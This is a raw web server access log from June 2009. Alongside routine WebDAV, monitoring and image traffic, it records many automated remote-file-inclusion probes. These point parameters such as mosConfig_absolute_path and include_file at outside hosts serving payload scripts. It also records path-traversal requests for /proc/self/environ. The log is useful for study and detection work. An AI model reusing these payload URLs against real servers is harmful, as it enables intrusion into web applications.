91.121.156.60 - - [24/Jun/2009:08:14:22 -0400] "GET /logs/includes/include_once.php?include_file=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:14:22 -0400] "GET /logs/access_log.Q109052100/includes/include_once.php?include_file=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.826"
172.16.1.79 - - [24/Jun/2009:08:14:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:14:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:14:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.139.67.116 - - [24/Jun/2009:08:15:37 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 262 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
172.16.1.98 - - [24/Jun/2009:08:15:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [24/Jun/2009:08:15:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [24/Jun/2009:08:15:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [24/Jun/2009:08:15:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [24/Jun/2009:08:15:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.98 - - [24/Jun/2009:08:15:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:16:10 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:16:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.79 - - [24/Jun/2009:08:16:10 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [24/Jun/2009:08:17:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.176 - - [24/Jun/2009:08:17:08 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:17:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:17:08 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
213.149.105.23 - - [24/Jun/2009:08:17:30 -0400] "GET /logs/access_log.Q109051000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fisherofmen.biz/phprealty/templates/languages/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
216.17.99.13 - - [24/Jun/2009:08:17:34 -0400] "GET /logs/access_log.Q109060100//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:34 -0400] "GET /logs/access_log.Q109060100//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:34 -0400] "GET /logs/access_log.Q109060100//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:34 -0400] "GET //common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:34 -0400] "GET //common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:34 -0400] "GET //common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:35 -0400] "GET /logs//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:35 -0400] "GET /logs//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:35 -0400] "GET /logs//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:39 -0400] "GET /logs/access_log.Q109050800//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:39 -0400] "GET /logs/access_log.Q109050800//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:17:40 -0400] "GET /logs/access_log.Q109050800//common/song.php?commonpath=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.826"
155.212.232.66 - - [24/Jun/2009:08:18:03 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:18:03 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:18:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
155.212.232.66 - - [24/Jun/2009:08:18:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; GTB6)"
172.16.1.176 - - [24/Jun/2009:08:18:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:18:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:18:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.68 - - [24/Jun/2009:08:18:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.68 - - [24/Jun/2009:08:18:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.68 - - [24/Jun/2009:08:18:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.203.196.99 - - [24/Jun/2009:08:18:31 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.819"
74.203.196.99 - - [24/Jun/2009:08:18:31 -0400] "GET /logs/access_log.Q109060300//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.819"
74.203.196.99 - - [24/Jun/2009:08:18:31 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.819"
74.203.196.99 - - [24/Jun/2009:08:18:31 -0400] "GET //components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.819"
74.203.196.99 - - [24/Jun/2009:08:18:31 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.819"
74.203.196.99 - - [24/Jun/2009:08:18:31 -0400] "GET /logs//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.819"
91.121.156.60 - - [24/Jun/2009:08:19:22 -0400] "GET /logs/access_log.Q109052100%20/includes/include_once.php?include_file=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.826"
124.0.139.129 - - [24/Jun/2009:08:19:37 -0400] "GET /logs/access_log.Q109052500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [24/Jun/2009:08:19:37 -0400] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://luchesk.com.ua///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.188.216.102 - - [24/Jun/2009:08:19:58 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
210.188.216.102 - - [24/Jun/2009:08:19:58 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
210.188.216.102 - - [24/Jun/2009:08:19:58 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://swoooper.com//config/b1tchXs4f3.txt???? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
77.221.130.5 - - [24/Jun/2009:08:20:12 -0400] "GET /logs/access_log.Q109051100/gallery//update/update5.php?lang=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
77.221.130.5 - - [24/Jun/2009:08:20:12 -0400] "GET /logs/gallery//update/update5.php?lang=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
77.221.130.5 - - [24/Jun/2009:08:20:12 -0400] "GET /gallery//update/update5.php?lang=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.5 - - [24/Jun/2009:08:20:13 -0400] "GET /logs/error_log.Q109030300/gallery//update/update5.php?lang=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
155.212.232.66 - - [24/Jun/2009:08:20:18 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
155.212.232.66 - - [24/Jun/2009:08:20:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
155.212.232.66 - - [24/Jun/2009:08:20:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)"
74.203.196.99 - - [24/Jun/2009:08:20:25 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.819"
91.121.156.60 - - [24/Jun/2009:08:20:28 -0400] "GET /logs/access_log.Q109050800/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:20:28 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 232 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:20:28 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.826"
91.121.156.60 - - [24/Jun/2009:08:20:31 -0400] "GET /logs/access_log.Q109052900/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://netcoreinvestments.com/idste.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.826"
172.16.1.159 - - [24/Jun/2009:08:21:39 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [24/Jun/2009:08:21:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.159 - - [24/Jun/2009:08:21:39 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
216.17.99.13 - - [24/Jun/2009:08:21:58 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:21:58 -0400] "GET //include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:21:58 -0400] "GET /logs//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
209.59.12.99 - - [24/Jun/2009:08:22:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.17.99.13 - - [24/Jun/2009:08:22:05 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:22:05 -0400] "GET //include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:22:05 -0400] "GET /logs//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:22:05 -0400] "GET /logs/access_log.Q109051800//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:22:06 -0400] "GET //include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:22:06 -0400] "GET /logs//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.826"
207.210.111.216 - - [24/Jun/2009:08:22:08 -0400] "GET /logs/error_log.Q109060500//aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.810"
207.210.111.216 - - [24/Jun/2009:08:22:08 -0400] "GET //aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.810"
207.210.111.216 - - [24/Jun/2009:08:22:08 -0400] "GET /logs//aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 267 "-" "libwww-perl/5.810"
74.203.196.99 - - [24/Jun/2009:08:22:21 -0400] "GET /logs/access_log.Q109051600//components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.819"
207.210.111.216 - - [24/Jun/2009:08:22:32 -0400] "GET /logs/access_log.Q109051300//aMember/plugins/payment/paymentsgateway/paymentsgateway.inc.php?config[root_dir]=http://www.wstardesigns.com/xcart/templates_c/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.810"
216.17.99.13 - - [24/Jun/2009:08:22:46 -0400] "GET //include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:22:46 -0400] "GET //include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:22:46 -0400] "GET //include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
172.16.1.176 - - [24/Jun/2009:08:23:51 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:23:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.176 - - [24/Jun/2009:08:23:51 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
63.223.104.57 - - [24/Jun/2009:08:23:59 -0400] "GET /logs/access_log.Q109052300//include/write.php?dir=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
216.17.99.13 - - [24/Jun/2009:08:23:59 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
63.223.104.57 - - [24/Jun/2009:08:23:59 -0400] "GET //include/write.php?dir=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:08:24:00 -0400] "GET /logs//include/write.php?dir=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.810"
216.17.99.13 - - [24/Jun/2009:08:24:01 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
216.17.99.13 - - [24/Jun/2009:08:24:12 -0400] "GET /logs/access_log.Q109051300//include/write.php?dir=http://hotels.ivycanada.ca/bbs/lang/idomila.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.826"
172.16.1.66 - - [24/Jun/2009:08:25:17 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.66 - - [24/Jun/2009:08:25:17 -0400] "PROPFIND /ca400 HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.9.27.230 - - [24/Jun/2009:08:25:28 -0400] "GET /images/login_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 (CK-KenseyNash) Firefox/2.0.0.20"
64.9.27.230 - - [24/Jun/2009:08:25:28 -0400] "GET /images/psearch_go.gif HTTP/1.0" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 (CK-KenseyNash) Firefox/2.0.0.20"
64.9.27.230 - - [24/Jun/2009:08:25:31 -0400] "GET /images/login_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 (CK-KenseyNash) Firefox/2.0.0.20"
64.9.27.230 - - [24/Jun/2009:08:25:31 -0400] "GET /images/psearch_go-over.gif HTTP/1.0" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 (CK-KenseyNash) Firefox/2.0.0.20"
63.223.104.57 - - [24/Jun/2009:08:25:59 -0400] "GET /logs/access_log.Q109052900//include/write.php?dir=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:08:25:59 -0400] "GET //include/write.php?dir=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.810"
63.223.104.57 - - [24/Jun/2009:08:26:00 -0400] "GET /logs//include/write.php?dir=http://vpk66.ru/images/stories/idd.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.810"
209.59.12.99 - - [24/Jun/2009:08:27:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
172.16.1.70 - - [24/Jun/2009:08:29:31 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [24/Jun/2009:08:29:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.70 - - [24/Jun/2009:08:29:31 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
124.32.56.166 - - [24/Jun/2009:08:29:59 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
172.16.1.80 - - [24/Jun/2009:08:30:18 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:30:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:30:18 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.84 - - [24/Jun/2009:08:30:40 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.84 - - [24/Jun/2009:08:30:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.84 - - [24/Jun/2009:08:30:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.84 - - [24/Jun/2009:08:30:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.84 - - [24/Jun/2009:08:30:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.84 - - [24/Jun/2009:08:30:40 -0400] "PROPFIND /EXCEL HTTP/1.1" 405 231 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:31:20 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:31:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.80 - - [24/Jun/2009:08:31:20 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [24/Jun/2009:08:32:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.26.78.209 - - [24/Jun/2009:08:32:13 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
80.26.78.209 - - [24/Jun/2009:08:32:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
124.32.56.166 - - [24/Jun/2009:08:32:15 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
124.32.56.166 - - [24/Jun/2009:08:32:15 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
80.26.78.209 - - [24/Jun/2009:08:32:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
80.26.78.209 - - [24/Jun/2009:08:32:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
124.32.56.166 - - [24/Jun/2009:08:32:16 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.fundacionbiofuturo.com/foto/idx.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
83.98.209.71 - - [24/Jun/2009:08:32:22 -0400] "GET /logs/access_log.Q109061800//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
83.98.209.71 - - [24/Jun/2009:08:32:22 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
